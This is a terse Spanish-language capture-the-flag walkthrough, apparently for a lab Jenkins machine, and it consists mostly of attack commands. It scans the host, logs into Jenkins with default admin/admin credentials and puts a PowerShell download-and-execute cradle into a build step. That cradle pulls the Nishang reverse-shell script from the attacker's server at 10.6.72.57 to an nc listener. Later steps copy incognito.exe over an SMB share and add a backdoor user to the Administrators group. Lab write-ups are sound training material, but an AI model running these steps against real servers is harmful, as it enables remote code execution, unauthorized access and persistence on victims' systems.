nmap -A -p- -oA output 10.10.32.27 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210430065343.png

nmap -sC -sV -O -p- -oA optimum 10.10.32.27

nmap -sU -O -p- -oA optimum-udp 10.10.32.27

nikto -h 10.10.32.27:80

gobuster dir -k -u http://10.10.32.27/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Pasted image 20210430065221.png

Vemos el puerto 8080 y nos logueamos con admin/admin en Jenkins.

Pasted image 20210430065314.png

Nos metemos a 10.10.32.27/job/project/configure y vemos que tiene un apartado para ejecutar comandos batch de Windows.

Pasted image 20210430065535.png

hacemos un locate Invoke-PowerShellTcp.ps1 cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 . Invoke-PowerShellTcp -Reverse -IPAddress 10.6.72.57 -Port 3333

Pasted image 20210430071711.png

python3 -m http.server 8888

En el cuadro de texto de Jenkins ponemos lo siguiente para ejecutar el script de PowerShell:

powershell iex (New-Object Net.WebClient).DownloadString(''http://10.6.72.57:8888/Invoke-PowerShellTcp.ps1')

Guardamos la configuración.

rlwrap nc -lvnp 3333

Pasted image 20210430073327.png

Hacemos clic en Build Now.

systeminfo

Pasted image 20210430073411.png

whoami /priv

Pasted image 20210430073623.png

sudo python2 /usr/share/doc/python-impacket/examples/smbserver.py temp ~/Desktop/boxes/incognito2

Pasted image 20210430074419.png

En la máquina de Windows:

cd windows\temp copy \10.6.72.57\temp\incognito.exe dir

Pasted image 20210430074748.png

./incognito.exe add_user cu3rv0x asi_es ./incognito.exe add_localgroup_user Administrators cu3rv0x

Pasted image 20210430075116.png

Pasted image 20210430084610.png

